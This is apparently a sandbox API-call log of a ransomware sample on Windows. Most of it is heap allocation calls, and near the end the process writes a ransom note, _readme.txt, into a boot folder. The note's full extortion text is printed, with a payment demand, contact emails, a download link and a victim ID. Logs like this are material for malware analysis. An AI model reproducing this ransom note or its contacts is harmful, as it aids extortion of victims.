1 [0201.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.656] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.657] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.657] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0201.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.658] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.659] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.659] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0201.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0201.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b65058 [0201.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.660] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b65058 [0201.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.660] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0201.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0201.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0201.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.661] PathFindFileNameW (pszPath="C:\\Boot\\sv-SE\\") returned="sv-SE\\" [0201.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.661] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0201.661] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.661] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0201.661] PathFindFileNameW (pszPath="") returned="" [0201.661] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9278 [0201.662] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75020000 [0201.662] GetProcAddress (hModule=0x75020000, lpProcName="SHGetFolderPathW") returned 0x750a5708 [0201.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3b65058 [0201.662] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b65058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0201.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3b68060 [0201.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9098 [0201.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9278 | out: hHeap=0x2c0000) returned 1 [0201.662] FreeLibrary (hLibModule=0x75020000) returned 1 [0201.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9098 | out: hHeap=0x2c0000) returned 1 [0201.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b65058 | out: hHeap=0x2c0000) returned 1 [0201.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x81c) returned 0x3b15070 [0201.662] PathAppendW (in: pszPath="C:\\Boot\\sv-SE\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 1 [0201.662] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b158f8 [0201.662] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f92f0 | out: hHeap=0x2c0000) returned 1 [0201.662] PathFileExistsW (pszPath="C:\\Boot\\sv-SE\\_readme.txt") returned 0 [0201.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3b68060 [0201.663] lstrcpyW (in: lpString1=0x3b68060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48" [0201.663] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj48", lpString2="8TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-PHJh5SU4jT\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0217OIWojlj488TaHEsq5r7cNJKbYdWseLEB2pW1FuZKoKjKg5tt1" [0201.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b16180 [0201.663] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\_readme.txt" (normalized: "c:\\boot\\sv-se\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0201.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b16180 | out: hHeap=0x2c0000) returned 1 [0201.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b68060 | out: hHeap=0x2c0000) returned 1 [0201.663] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0201.663] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f92f0 [0201.663] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, 